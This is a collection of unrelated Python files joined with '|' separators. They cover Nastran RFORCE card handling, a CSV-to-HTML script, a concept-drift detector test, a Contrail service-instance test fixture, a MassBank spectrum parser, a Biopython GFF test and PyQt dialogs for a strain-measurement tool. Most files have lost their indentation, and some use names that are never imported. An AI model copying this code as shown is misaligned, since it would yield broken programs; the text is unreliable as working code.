from pyNastran.bdf.bdf_interface.assign_type import (integer, integer_or_blank,
double_or_blank)
class RFORCE:
type = 'RFORCE'
def __init__(self, model):
"""
Defines the RFORCE object.
Parameters
----------
model : BDF
the BDF object
.. todo:: collapse loads
"""
self.model = model
self.n = 0
self._cards = []
self._comments = []
def __getitem__(self, i):
unique_lid = unique(self.load_id)
if len(i):
f = RFORCE(self.model)
f.load_id = self.load_id[i]
f.node_id = self.node_id[i]
f.coord_id = self.coord_id[i]
f.scale_vel = self.scale_vel[i]
f.r = self.r[i]
f.method = self.method[i]
f.scale_acc = self.scale_acc[i]
f.mb = self.mb[i]
f.idrf = self.idrf[i]
f.n = len(i)
return f
raise RuntimeError('len(i) = 0')
def __mul__(self, value):
f = RFORCE(self.model)
f.load_id = self.load_id
f.node_id = self.node_id
f.coord_id = self.coord_id
f.scale_vel = self.scale_vel * value
f.r = self.r
f.method = self.method
f.scale_acc = self.scale_acc * value
f.mb = self.mb
f.idrf = self.idrf
f.n = self.n
return f
def __rmul__(self, value):
return self.__mul__(value)
def allocate(self, ncards):
float_fmt = self.model.float_fmt
self.load_id = zeros(ncards, 'int32')
self.node_id = zeros(ncards, 'int32')
self.coord_id = zeros(ncards, 'int32')
self.r = zeros((ncards, 3), float_fmt)
self.scale_vel = zeros(ncards, float_fmt)
self.method = zeros(ncards, 'int32')
self.scale_acc = zeros(ncards, float_fmt)
self.mb = zeros(ncards, 'int32')
self.idrf = zeros(ncards, 'int32')
def add_card(self, card, comment=''):
self._cards.append(card)
self._comments.append(comment)
    def build(self):
        """
        Builds the RFORCE arrays from the cards previously queued with ``add_card``.
        """
cards = self._cards
ncards = len(cards)
self.n = ncards
if ncards:
float_fmt = self.model.float_fmt
#: Property ID
self.load_id = zeros(ncards, 'int32')
self.node_id = zeros(ncards, 'int32')
self.coord_id = zeros(ncards, 'int32')
self.r = zeros((ncards, 3), float_fmt)
self.scale_vel = zeros(ncards, float_fmt)
self.method = zeros(ncards, 'int32')
self.scale_acc = zeros(ncards, float_fmt)
self.mb = zeros(ncards, 'int32')
self.idrf = zeros(ncards, 'int32')
for i, card in enumerate(cards):
self.load_id[i] = integer(card, 1, 'load_id')
self.node_id[i] = integer(card, 2, 'node_id')
self.coord_id[i] = integer_or_blank(card, 3, 'coord_id', 0)
self.scale_vel[i] = double_or_blank(card, 4, 'scale', 1.)
self.r[i] = [double_or_blank(card, 5, 'R1', 0.),
double_or_blank(card, 6, 'R2', 0.),
double_or_blank(card, 7, 'R3', 0.)]
self.method[i] = integer_or_blank(card, 8, 'method', 1)
self.scale_acc[i] = double_or_blank(card, 9, 'racc', 0.)
self.mb[i] = integer_or_blank(card, 10, 'mb', 0)
self.idrf[i] = integer_or_blank(card, 11, 'idrf', 0)
assert len(card) <= 12, 'len(RFORCE card) = %i\ncard=%s' % (len(card), card)
i = self.load_id.argsort()
self.load_id = self.load_id[i]
self.node_id = self.node_id[i]
self.coord_id = self.coord_id[i]
self.scale_vel = self.scale_vel[i]
self.r = self.r[i]
self.method = self.method[i]
self.scale_acc = self.scale_acc[i]
self.mb = self.mb[i]
self.idrf = self.idrf[i]
self._cards = []
self._comments = []
def get_stats(self):
msg = []
if self.n:
msg.append(' %-8s: %i' % ('RFORCE', self.n))
return msg
def write_card(self, bdf_file, size=8, lids=None):
if self.n:
            for (lid, nid, cid, scale_vel, r, method, scale_acc, mb, idrf) in zip(
                    self.load_id, self.node_id, self.coord_id, self.scale_vel,
                    self.r, self.method, self.scale_acc, self.mb, self.idrf):
#method = set_blank_if_default(method, 1)
scale_acc = set_blank_if_default(scale_acc, 0.)
mb = set_blank_if_default(mb, 0)
idrf = set_blank_if_default(idrf, 0)
card = ['RFORCE', lid, nid, cid, scale_vel,
r[0], r[1], r[2], method, scale_acc, mb, idrf]
if size == 8:
bdf_file.write(print_card_8(card))
else:
bdf_file.write(print_card_16(card))
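# Minimal usage sketch (assumes a pyNastran-style BDF `model` and an already-parsed
# `card`; illustrative only, not an official API example):
#     rforce = RFORCE(model)
#     rforce.add_card(card)                # queue an RFORCE card: SID, G, CID, A, R1-R3, METHOD, RACC, MB, IDRF
#     rforce.build()                       # convert queued cards to numpy arrays, sorted by load_id
#     rforce.write_card(bdf_file, size=8)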
|
#!/usr/bin/env python
# Python 2/3 compatibility
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
import collections
import csv
import sys
Item = collections.namedtuple('Item', ['name', 'value', 'url'])
def _YieldItems(csvfile):
csvreader = csv.reader(csvfile)
for row in csvreader:
yield Item(*row)
def _WriteTable(items, out):
out.write('<table>\n')
out.write('<tr>\n')
for name, _, _ in items:
out.write('<th>%s</th>\n' % name)
out.write('</tr>\n')
out.write('<tr>')
for _, val, url in items:
out.write('<td>\n')
out.write('<a href="%s">%s</a>\n' % (url, val))
out.write('</td>\n')
out.write('</tr>\n')
out.write('</table>')
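# _WriteTable emits a single-row table: one <th> cell per item name, then one <td> cell
# whose value links to that item's URL; _YieldItems expects CSV rows of "name,value,url".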
def main():
out = sys.stdout
    with open('spur.csv') as csvfile:
        spur_items = list(_YieldItems(csvfile))
out.write('<!doctype html>\n')
out.write('<html>\n')
out.write('<body>\n')
out.write('<h1>SPUR</h1>')
_WriteTable(spur_items, out)
out.write('</body>\n')
out.write('</html>\n')
if __name__ == '__main__':
main()
|
import numpy as np
import matplotlib.pyplot as plt
from hddm_a import HDDM_A
def showPlot(data, data2):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(range(len(data)), data)
ax.plot(range(len(data2)), data2)
plt.legend(['acc','bound'])
plt.show()
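# The two tests below inject concept drift into a synthetic binary stream: tst() overwrites
# indices 1000-1199 and 1500-1699 with constant 1s, while tst2() swaps in Bernoulli(0.8)
# samples over the same index windows; both plot HDDM_A's running estimate (Z_) against
# its drift bound (Z_epsilon).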
def tst():
hddm = HDDM_A()
data_stream = np.random.randint(2, size=2000)
    average_prediction = []
average_prediction_bound = []
for i in range(1000, 1200):
data_stream[i] = 1
for i in range(1500, 1700):
data_stream[i] = 1
for i in range(2000):
hddm.add_element(data_stream[i])
if hddm.detected_warning_zone():
print('Warning zone has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
if hddm.detected_change():
print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
        average_prediction.append(hddm.Z_)
average_prediction_bound.append(hddm.Z_epsilon)
# print('X', hddm.X_, ' ', 'Z', hddm.Z_)
# print('X_e', hddm.X_epsilon, ' ', 'Z', hddm.Z_epsilon)
    showPlot(average_prediction, average_prediction_bound)
def tst2():
hddm = HDDM_A()
data_stream = np.random.binomial(1, 0.5, 2000)
change_data_stream = np.random.binomial(1, 0.8, 500)
    average_prediction = []
average_prediction_bound = []
for i in range(1000, 1200):
data_stream[i] = change_data_stream[i-1000]
for i in range(1500, 1700):
data_stream[i] = change_data_stream[i+200-1500]
for i in range(2000):
hddm.add_element(data_stream[i])
if hddm.detected_warning_zone():
print('Warning zone has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
if hddm.detected_change():
print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
        average_prediction.append(hddm.Z_)
average_prediction_bound.append(hddm.Z_epsilon)
# print('X', hddm.X_, ' ', 'Z', hddm.Z_)
# print('X_e', hddm.X_epsilon, ' ', 'Z', hddm.Z_epsilon)
    showPlot(average_prediction, average_prediction_bound)
if __name__ == '__main__':
tst2()
|
import fixtures
from vnc_api.vnc_api import *
from util import retry
from time import sleep
from tcutils.services import get_status
from webui_test import *
class SvcInstanceFixture(fixtures.Fixture):
def __init__(self, connections, inputs, domain_name, project_name, si_name,
svc_template, if_list, left_vn_name=None, right_vn_name=None, do_verify=True, max_inst=1, static_route=['None', 'None', 'None']):
self.vnc_lib = connections.vnc_lib
self.api_s_inspect = connections.api_server_inspect
self.nova_fixture = connections.nova_fixture
self.inputs = connections.inputs
self.domain_name = domain_name
self.project_name = project_name
self.si_name = si_name
self.svc_template = svc_template
self.st_name = svc_template.name
self.si_obj = None
self.domain_fq_name = [self.domain_name]
self.project_fq_name = [self.domain_name, self.project_name]
self.si_fq_name = [self.domain_name, self.project_name, self.si_name]
self.logger = inputs.logger
self.left_vn_name = left_vn_name
self.right_vn_name = right_vn_name
self.do_verify = do_verify
self.if_list = if_list
self.max_inst = max_inst
self.static_route = static_route
self.si = None
self.svm_ids = []
self.cs_svc_vns = []
self.cs_svc_ris = []
self.svn_list = ['svc-vn-mgmt', 'svc-vn-left', 'svc-vn-right']
if self.inputs.webui_verification_flag:
self.browser = connections.browser
self.browser_openstack = connections.browser_openstack
self.webui = WebuiTest(connections, inputs)
# end __init__
def setUp(self):
super(SvcInstanceFixture, self).setUp()
self.si_obj = self._create_si()
# end setUp
def cleanUp(self):
super(SvcInstanceFixture, self).cleanUp()
self._delete_si()
assert self.verify_on_cleanup()
# end cleanUp
def _create_si(self):
self.logger.debug("Creating service instance: %s", self.si_fq_name)
try:
svc_instance = self.vnc_lib.service_instance_read(
fq_name=self.si_fq_name)
self.logger.debug(
"Service instance: %s already exists", self.si_fq_name)
except NoIdError:
project = self.vnc_lib.project_read(fq_name=self.project_fq_name)
svc_instance = ServiceInstance(self.si_name, parent_obj=project)
if self.left_vn_name and self.right_vn_name:
si_prop = ServiceInstanceType(
left_virtual_network=self.left_vn_name,
right_virtual_network=self.right_vn_name)
bridge = False
if 'bridge_svc_instance_1' in self.si_fq_name:
bridge = True
for itf in self.if_list:
if (itf[0] == 'left' and not bridge):
virtual_network = self.left_vn_name
elif (itf[0] == 'right' and not bridge):
virtual_network = self.right_vn_name
else:
virtual_network = ""
if_type = ServiceInstanceInterfaceType(
virtual_network=virtual_network,
static_routes=RouteTableType([RouteType(prefix=self.static_route[self.if_list.index(itf)])]))
if_type.set_static_routes(
RouteTableType([RouteType(prefix=self.static_route[self.if_list.index(itf)])]))
si_prop.add_interface_list(if_type)
else:
if self.left_vn_name:
# In Network mode
si_prop = ServiceInstanceType(
left_virtual_network=self.left_vn_name)
intf_count = 1
virtual_network = self.left_vn_name
else:
# Transparent mode
si_prop = ServiceInstanceType()
intf_count = 1
virtual_network = ""
if self.svc_template.service_template_properties.service_type == 'firewall':
# Transparent mode firewall
intf_count = 3
for i in range(intf_count):
if_type = ServiceInstanceInterfaceType(
virtual_network=virtual_network)
si_prop.add_interface_list(if_type)
si_prop.set_scale_out(ServiceScaleOutType(self.max_inst))
svc_instance.set_service_instance_properties(si_prop)
svc_instance.set_service_template(self.svc_template)
if self.inputs.webui_config_flag:
self.webui.create_svc_instance_in_webui(self)
else:
self.vnc_lib.service_instance_create(svc_instance)
svc_instance = self.vnc_lib.service_instance_read(
fq_name=self.si_fq_name)
return svc_instance
# end _create_si
def _delete_si(self):
self.logger.debug("Deleting service instance: %s", self.si_fq_name)
self.vnc_lib.service_instance_delete(fq_name=self.si_fq_name)
# end _delete_si
def verify_si(self):
"""check service instance"""
self.project = self.vnc_lib.project_read(fq_name=self.project_fq_name)
try:
self.si = self.vnc_lib.service_instance_read(
fq_name=self.si_fq_name)
            self.logger.debug(
                "Service instance: %s created successfully", self.si_fq_name)
except NoIdError:
errmsg = "Service instance: %s not found." % self.si_fq_name
self.logger.warn(errmsg)
return (False, errmsg)
return True, None
def verify_st(self):
"""check service template"""
self.cs_si = self.api_s_inspect.get_cs_si(
si=self.si_name, refresh=True)
try:
st_refs = self.cs_si['service-instance']['service_template_refs']
except KeyError:
st_refs = None
if not st_refs:
errmsg = "No service template refs in SI '%s'" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
st_ref_name = [st_ref['to'][-1]
for st_ref in st_refs if st_ref['to'][-1] == self.st_name]
if not st_ref_name:
errmsg = "SI '%s' has no service template ref to %s" % (
self.si_name, self.st_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("SI '%s' has service template ref to %s",
self.si_name, self.st_name)
return True, None
@retry(delay=10, tries=15)
def verify_svm(self):
"""check Service VM"""
try:
self.vm_refs = self.cs_si[
'service-instance']['virtual_machine_back_refs']
except KeyError:
self.vm_refs = None
if not self.vm_refs:
            errmsg = "SI %s doesn't have back refs to Service VM" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("SI %s has back refs to Service VM", self.si_name)
self.svm_ids = [vm_ref['to'][0] for vm_ref in self.vm_refs]
for svm_id in self.svm_ids:
cs_svm = self.api_s_inspect.get_cs_vm(vm_id=svm_id, refresh=True)
if not cs_svm:
errmsg = "Service VM for SI '%s' not launched" % self.si_name
self.logger.warn(errmsg)
#self.logger.debug("Service monitor status: %s", get_status('contrail-svc-monitor'))
return (False, errmsg)
        self.logger.debug("Service VM for SI '%s' is launched", self.si_name)
return True, None
def svm_compute_node_ip(self):
admin_project_uuid = self.api_s_inspect.get_cs_project()['project'][
'uuid']
svm_name = self.si_name + str('_1')
svm_obj = self.nova_fixture.get_vm_if_present(
svm_name, admin_project_uuid)
svm_compute_node_ip = self.inputs.host_data[
self.nova_fixture.get_nova_host_of_vm(svm_obj)]['host_ip']
return svm_compute_node_ip
@retry(delay=1, tries=5)
def verify_interface_props(self):
"""check if properties"""
try:
vm_if_props = self.svc_vm_if[
'virtual-machine-interface']['virtual_machine_interface_properties']
except KeyError:
vm_if_props = None
if not vm_if_props:
errmsg = "No VM interface in Service VM of SI %s" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug(
"VM interface present in Service VM of SI %s", self.si_name)
self.if_type = vm_if_props['service_interface_type']
if (not self.if_type and self.if_type not in self.if_list):
            errmsg = "Interface type '%s' is not present in Service VM of SI '%s'" % (
self.if_type, self.si_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug(
"Interface type '%s' is present in Service VM of SI '%s'", self.if_type, self.si_name)
return True, None
@retry(delay=1, tries=5)
def verify_vn_links(self):
"""check vn links"""
try:
vn_refs = self.svc_vm_if[
'virtual-machine-interface']['virtual_network_refs']
except KeyError:
vn_refs = None
if not vn_refs:
errmsg = "IF %s has no back refs to vn" % self.if_type
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("IF %s has back refs to vn", self.if_type)
for vn in vn_refs:
self.svc_vn = self.api_s_inspect.get_cs_vn(
vn=vn['to'][-1], refresh=True)
if not self.svc_vn:
errmsg = "IF %s has no vn" % self.if_type
self.logger.warn(errmsg)
return (False, errmsg)
if self.svc_vn['virtual-network']['name'] in self.svn_list:
self.cs_svc_vns.append(vn['to'][-1])
self.logger.debug("IF %s has vn '%s'", self.if_type,
self.svc_vn['virtual-network']['name'])
return True, None
@retry(delay=1, tries=5)
def verify_ri(self):
"""check routing instance"""
try:
ri_refs = self.svc_vm_if[
'virtual-machine-interface']['routing_instance_refs']
except KeyError:
ri_refs = None
vn_name = self.svc_vn['virtual-network']['name']
if not ri_refs:
errmsg = "IF %s, VN %s has no back refs to routing instance" % (
self.if_type, vn_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug(
"IF %s, VN %s has back refs to routing instance", self.if_type, vn_name)
for ri in ri_refs:
svc_ri = self.api_s_inspect.get_cs_ri_by_id(ri['uuid'])
if not svc_ri:
errmsg = "IF %s VN %s has no RI" % (self.if_type, vn_name)
self.logger.warn(errmsg)
return (False, errmsg)
if svc_ri['routing-instance']['name'] in self.svn_list:
self.cs_svc_ris.append(ri['uuid'])
ri_name = svc_ri['routing-instance']['name']
self.logger.debug("IF %s VN %s has RI", self.if_type, vn_name)
if ri_name == vn_name:
continue
else:
if not ri['attr']:
errmsg = "IF %s VN %s RI %s no attributes" % (
self.if_type, vn_name, ri_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("IF %s VN %s RI %s has attributes",
self.if_type, vn_name, ri_name)
# check service chain
sc_info = svc_ri[
'routing-instance']['service_chain_information']
if not sc_info:
errmsg = "IF %s VN %s RI %s has no SCINFO" % (
self.if_type, vn_name, ri_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("IF %s VN %s RI %s has SCINFO",
self.if_type, vn_name, ri_name)
return True, None
def verify_svm_interface(self):
# check VM interfaces
for svm_id in self.svm_ids:
cs_svm = self.api_s_inspect.get_cs_vm(vm_id=svm_id, refresh=True)
svm_ifs = (cs_svm['virtual-machine'].get('virtual_machine_interfaces') or
cs_svm['virtual-machine'].get('virtual_machine_interface_back_refs'))
if len(svm_ifs) != len(self.if_list):
                errmsg = "Service VM doesn't have all the interfaces %s" % self.if_list
self.logger.warn(errmsg)
return False, errmsg
svc_vm_if = self.api_s_inspect.get_cs_vmi_of_vm(svm_id, refresh=True)
for self.svc_vm_if in svc_vm_if:
result, msg = self.verify_interface_props()
if not result:
return result, msg
result, msg = self.verify_vn_links()
if not result:
return result, msg
result, msg = self.verify_ri()
if not result:
return result, msg
return True, None
def verify_on_setup(self):
self.report(self.verify_si())
self.report(self.verify_st())
self.report(self.verify_svm())
self.report(self.verify_svm_interface())
return True, None
# end verify_on_setup
def report(self, result):
if type(result) is tuple:
result, errmsg = result
if not result:
assert False, errmsg
@retry(delay=2, tries=15)
def verify_si_not_in_api_server(self):
if not self.si:
return True, None
si = self.api_s_inspect.get_cs_si(si=self.si_name, refresh=True)
if si:
errmsg = "Service instance %s not removed from api server" % self.si_name
self.logger.warn(errmsg)
return False, errmsg
self.logger.debug("Service instance %s removed from api server" %
self.si_name)
return True, None
@retry(delay=5, tries=20)
def verify_svm_not_in_api_server(self):
for svm_id in self.svm_ids:
cs_svm = self.api_s_inspect.get_cs_vm(vm_id=svm_id, refresh=True)
if cs_svm:
errmsg = "Service VM for SI '%s' not deleted" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
        self.logger.debug("Service VM for SI '%s' is deleted", self.si_name)
return True, None
def si_exists(self):
svc_instances = self.vnc_lib.service_instances_list()[
'service-instances']
if len(svc_instances) == 0:
return False
return True
@retry(delay=2, tries=15)
def verify_svn_not_in_api_server(self):
if self.si_exists():
self.logger.info(
"Some Service Instance exists; skip SVN check in API server")
return True, None
for vn in self.cs_svc_vns:
svc_vn = self.api_s_inspect.get_cs_vn(vn=vn, refresh=True)
if svc_vn:
errmsg = "Service VN %s is not removed from api server" % vn
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("Service VN %s is removed from api server", vn)
return True, None
@retry(delay=2, tries=15)
def verify_ri_not_in_api_server(self):
if self.si_exists():
self.logger.info(
"Some Service Instance exists; skip RI check in API server")
return True, None
for ri in self.cs_svc_ris:
svc_ri = self.api_s_inspect.get_cs_ri_by_id(ri)
if svc_ri:
errmsg = "RI %s is not removed from api server" % ri
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("RI %s is removed from api server", ri)
return True, None
def verify_on_cleanup(self):
result = True
result, msg = self.verify_si_not_in_api_server()
assert result, msg
result, msg = self.verify_svm_not_in_api_server()
assert result, msg
if self.do_verify:
result, msg = self.verify_svn_not_in_api_server()
assert result, msg
result, msg = self.verify_ri_not_in_api_server()
assert result, msg
return result
# end verify_on_cleanup
# end SvcInstanceFixture
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 14 12:17:55 2018
@author: darne
"""
from rdkit import Chem
import os
import numpy as np
import pickle
import cirpy
MS_Records = []
MassBank_Folder = os.listdir("C:/Users/darne/MassBank-data")
all_canon_SMILES = []
for subfolder in MassBank_Folder:
if "." in subfolder:
continue
else:
subfolder_path = "C:/Users/darne/MassBank-data" + "/" + subfolder
subfolder_files = os.listdir(subfolder_path) #list of filename strings
EXTENSION = "txt"
for file in subfolder_files:
if not file.endswith(EXTENSION):
continue
else:
textfilepath = subfolder_path + "/" + file
with open(textfilepath) as f:
text = f.read()
mz_list = []
spectrum_data = text.split("PK$PEAK:")[-1]
spectrum_data = spectrum_data.splitlines()
spectrum_data.remove(' m/z int. rel.int.')
spectrum_data.remove('//')
split_spectrum_data = []
for line in spectrum_data:
line = line.split()
mz_entry = (line[0], line[1], line[2])
mz_list.append(mz_entry)
mz_array = np.array(mz_list)
text_lines = text.splitlines()
detail_lines = []
for line in text_lines:
if "CH$SMILES:" in line:
SMILES_text = line[11:]
elif "CH$IUPAC:" in line:
InChI_text = line[10:]
elif "CH$NAME:" in line:
Mol_name = line[9:]
elif (line[0:3] == "AC$") or (line[0:3] == "MS$"):
detail_lines.append(line[3:])
Details = detail_lines
if SMILES_text != "N/A":
mol = Chem.MolFromSmiles(SMILES_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
elif InChI_text != "N/A":
mol = Chem.MolFromInchi(InChI_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
else:
SMILES_text = cirpy.resolve(Mol_name, "smiles")
if SMILES_text == None:
InChI_text = cirpy.resolve(Mol_name, "stdinchi")
if InChI_text == None:
continue
else:
mol = Chem.MolFromInchi(InChI_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
else:
mol = Chem.MolFromSmiles(SMILES_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
molecule_record = {"Name":Mol_name,
"SMILES":SMILES_text,
"InChI":InChI_text,
"Canonical SMILES":canonical_SMILES,
"Canonical InChI":canonical_InChI,
"m/z Array":mz_array,
"Details":Details
}
MS_Records.append(molecule_record)
with open("MS_Records.pickle", "wb") as MS_Records_pickle:
    pickle.dump(MS_Records, MS_Records_pickle)
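# For reference, the parser above relies on the MassBank record conventions visible in the
# code: "CH$NAME:", "CH$SMILES:" and "CH$IUPAC:" lines for identity, "AC$"/"MS$" lines for
# acquisition details, and a peak table that follows "PK$PEAK:", starts with the
# " m/z int. rel.int." header line, and ends with a "//" terminator.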
|
#!/usr/bin/env python
"""Test the Bio.GFF module and dependencies
"""
import os
from Bio import MissingExternalDependencyError
# only do the test if we are set up to do it. We need to have MYSQLPASS
# set and have a GFF wormbase installed (see the code in Bio/GFF/__init__.py)
if "MYSQLPASS" not in os.environ:
raise MissingExternalDependencyError("Environment is not configured for this test (not important if you do not plan to use Bio.GFF).")
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import Bio.GFF
warnings.resetwarnings()
print("Running Bio.GFF doctests...")
Bio.GFF._test()
print("Bio.GFF doctests complete.")
|
import numpy as np
from PyQt5 import QtCore, QtGui, QtWidgets
from sscanss.config import path_for, settings
from sscanss.core.math import Plane, Matrix33, Vector3, clamp, map_range, trunc, VECTOR_EPS
from sscanss.core.geometry import mesh_plane_intersection
from sscanss.core.util import Primitives, DockFlag, StrainComponents, PointType, PlaneOptions, Attributes
from sscanss.ui.widgets import (FormGroup, FormControl, GraphicsView, GraphicsScene, create_tool_button, FormTitle,
create_scroll_area, CompareValidator, GraphicsPointItem, Grid, create_icon)
from .managers import PointManager
class InsertPrimitiveDialog(QtWidgets.QWidget):
    """Provides UI for creating a primitive model (tube, sphere, cylinder, or cuboid) and adding it to the sample
:param primitive: primitive type
:type primitive: Primitives
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, primitive, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = self.parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.primitive = primitive
self.main_layout = QtWidgets.QVBoxLayout()
self.textboxes = {}
name = self.parent_model.uniqueKey(self.primitive.value)
self.mesh_args = {'name': name}
if self.primitive == Primitives.Tube:
self.mesh_args.update({'outer_radius': 100.000, 'inner_radius': 50.000, 'height': 200.000})
elif self.primitive == Primitives.Sphere:
self.mesh_args.update({'radius': 100.000})
elif self.primitive == Primitives.Cylinder:
self.mesh_args.update({'radius': 100.000, 'height': 200.000})
else:
self.mesh_args.update({'width': 50.000, 'height': 100.000, 'depth': 200.000})
self.createPrimitiveSwitcher()
self.createFormInputs()
button_layout = QtWidgets.QHBoxLayout()
self.create_primitive_button = QtWidgets.QPushButton('Create')
        self.create_primitive_button.clicked.connect(self.createPrimitiveButtonClicked)
button_layout.addWidget(self.create_primitive_button)
button_layout.addStretch(1)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
self.title = 'Insert {}'.format(self.primitive.value)
self.setMinimumWidth(450)
self.textboxes['name'].setFocus()
def createPrimitiveSwitcher(self):
switcher_layout = QtWidgets.QHBoxLayout()
switcher = create_tool_button(style_name='MenuButton', status_tip='Open dialog for a different primitive')
switcher.setArrowType(QtCore.Qt.DownArrow)
switcher.setPopupMode(QtWidgets.QToolButton.InstantPopup)
switcher.setMenu(self.parent.primitives_menu)
switcher_layout.addStretch(1)
switcher_layout.addWidget(switcher)
self.main_layout.addLayout(switcher_layout)
def createFormInputs(self):
self.form_group = FormGroup()
for key, value in self.mesh_args.items():
pretty_label = key.replace('_', ' ').title()
if key == 'name':
control = FormControl(pretty_label, value, required=True)
control.form_lineedit.textChanged.connect(self.nameCheck)
else:
control = FormControl(pretty_label, value, desc='mm', required=True, number=True)
control.range(0, None, min_exclusive=True)
self.textboxes[key] = control
self.form_group.addControl(control)
if self.primitive == Primitives.Tube:
outer_radius = self.textboxes['outer_radius']
inner_radius = self.textboxes['inner_radius']
outer_radius.compareWith(inner_radius, CompareValidator.Operator.Greater)
inner_radius.compareWith(outer_radius, CompareValidator.Operator.Less)
self.main_layout.addWidget(self.form_group)
self.form_group.groupValidation.connect(self.formValidation)
def nameCheck(self, value):
if self.parent_model.all_sample_key == value:
self.textboxes['name'].isInvalid(f'"{self.parent_model.all_sample_key}" is a reserved name')
def formValidation(self, is_valid):
if is_valid:
self.create_primitive_button.setEnabled(True)
else:
self.create_primitive_button.setDisabled(True)
    def createPrimitiveButtonClicked(self):
for key, textbox in self.textboxes.items():
value = textbox.value
self.mesh_args[key] = value
self.parent.presenter.addPrimitive(self.primitive, self.mesh_args)
new_name = self.parent_model.uniqueKey(self.primitive.value)
self.textboxes['name'].value = new_name
class InsertPointDialog(QtWidgets.QWidget):
"""Provides UI for typing in measurement/fiducial points
:param point_type: point type
:type point_type: PointType
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, point_type, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.point_type = point_type
self.title = 'Add {} Point'.format(point_type.value)
self.main_layout = QtWidgets.QVBoxLayout()
unit = 'mm'
self.form_group = FormGroup()
self.x_axis = FormControl('X', 0.0, required=True, desc=unit, number=True)
self.y_axis = FormControl('Y', 0.0, required=True, desc=unit, number=True)
self.z_axis = FormControl('Z', 0.0, required=True, desc=unit, number=True)
self.form_group.addControl(self.x_axis)
self.form_group.addControl(self.y_axis)
self.form_group.addControl(self.z_axis)
self.form_group.groupValidation.connect(self.formValidation)
button_layout = QtWidgets.QHBoxLayout()
self.execute_button = QtWidgets.QPushButton(self.title)
self.execute_button.clicked.connect(self.executeButtonClicked)
button_layout.addWidget(self.execute_button)
button_layout.addStretch(1)
self.main_layout.addWidget(self.form_group)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
self.setMinimumWidth(450)
def formValidation(self, is_valid):
if is_valid:
self.execute_button.setEnabled(True)
else:
self.execute_button.setDisabled(True)
def executeButtonClicked(self):
point = [self.x_axis.value, self.y_axis.value, self.z_axis.value]
self.parent.presenter.addPoints([(point, True)], self.point_type)
class InsertVectorDialog(QtWidgets.QWidget):
"""Provides UI for adding measurement vectors using a variety of methods
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.title = 'Add Measurement Vectors'
self.main_layout = QtWidgets.QVBoxLayout()
spacing = 10
self.main_layout.addSpacing(spacing)
self.main_layout.addWidget(QtWidgets.QLabel('Measurement Point:'))
self.points_combobox = QtWidgets.QComboBox()
self.points_combobox.setView(QtWidgets.QListView())
self.main_layout.addWidget(self.points_combobox)
self.updatePointList()
self.main_layout.addSpacing(spacing)
layout = QtWidgets.QHBoxLayout()
alignment_layout = QtWidgets.QVBoxLayout()
alignment_layout.addWidget(QtWidgets.QLabel('Alignment:'))
self.alignment_combobox = QtWidgets.QComboBox()
self.alignment_combobox.setView(QtWidgets.QListView())
self.alignment_combobox.setInsertPolicy(QtWidgets.QComboBox.InsertAtCurrent)
self.updateAlignment()
self.alignment_combobox.activated.connect(self.addNewAlignment)
self.alignment_combobox.currentIndexChanged.connect(self.changeRenderedAlignment)
alignment_layout.addWidget(self.alignment_combobox)
alignment_layout.addSpacing(spacing)
layout.addLayout(alignment_layout)
self.detector_combobox = QtWidgets.QComboBox()
self.detector_combobox.setView(QtWidgets.QListView())
self.detector_combobox.addItems(list(self.parent_model.instrument.detectors.keys()))
if len(self.parent_model.instrument.detectors) > 1:
detector_layout = QtWidgets.QVBoxLayout()
detector_layout.addWidget(QtWidgets.QLabel('Detector:'))
detector_layout.addWidget(self.detector_combobox)
size = self.detector_combobox.iconSize()
self.detector_combobox.setItemIcon(0, create_icon(settings.value(settings.Key.Vector_1_Colour), size))
self.detector_combobox.setItemIcon(1, create_icon(settings.value(settings.Key.Vector_2_Colour), size))
detector_layout.addSpacing(spacing)
layout.addSpacing(spacing)
layout.addLayout(detector_layout)
self.main_layout.addLayout(layout)
self.main_layout.addWidget(QtWidgets.QLabel('Strain Component:'))
self.component_combobox = QtWidgets.QComboBox()
self.component_combobox.setView(QtWidgets.QListView())
strain_components = [s.value for s in StrainComponents]
self.component_combobox.addItems(strain_components)
self.component_combobox.currentTextChanged.connect(self.toggleKeyInBox)
self.main_layout.addWidget(self.component_combobox)
